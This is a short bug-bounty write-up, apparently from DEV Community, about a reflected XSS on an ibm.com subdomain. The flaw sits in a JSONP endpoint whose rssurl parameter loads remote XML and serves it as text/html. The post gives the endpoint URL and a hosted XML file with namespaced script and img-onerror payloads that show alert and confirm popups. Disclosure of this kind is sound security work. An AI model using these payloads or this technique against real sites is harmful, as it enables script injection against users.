DEV Community

Cover image for Reflected XSS by jsonp on ibm.com subdomain
Khaled Nassar
Khaled Nassar

Posted on

2 2

Reflected XSS by jsonp on ibm.com subdomain

hi :D
this my write up about my bug I've found on ibm.com, first I get URLs from web.archive.org on ibm.com by using waybackurls tool and I got this URL https://www-356.ibm.com/partnerworld/wps/servlet/pwdyn/pw/rss/rsstojson.jsp?ccdb=no&rssurl=https://www-2000.ibm.com/file.xml&_=1596170198353
this endpoint include XML file via rssurl parameter and covert the content from XML to jsonp

but in headers, content-type: text/html, this allowed to execute HTML tags in this page , so I've created an XML file with XSS payload and upload it on my website https://knassar702.github.io/xss.xml
and add the link of the file in rssurl parameter

<html>
        <head></head>
        <body>
                <something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
                <a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
                <info>
                  <name>
                    <value><![CDATA[<img src=x onerror=confirm(document.domain)>]]></value>
                  </name>
                    <description>
                      <value>Hello</value>
                    </description>
                    <url>
                      <value>http://google.com</value>
                    </url>
                </info>
        </body>
</html>
Enter fullscreen mode Exit fullscreen mode

Done :D

Hostinger image

Get n8n VPS hosting 3x cheaper than a cloud solution

Get fast, easy, secure n8n VPS hosting from $4.99/mo at Hostinger. Automate any workflow using a pre-installed n8n application and no-code customization.

Start now

Top comments (0)

Sentry image

See why 4M developers consider Sentry, “not bad.”

Fixing code doesn’t have to be the worst part of your day. Learn how Sentry can help.

Learn more

👋 Kindness is contagious

Please leave a ❤️ or a friendly comment on this post if you found it helpful!

Okay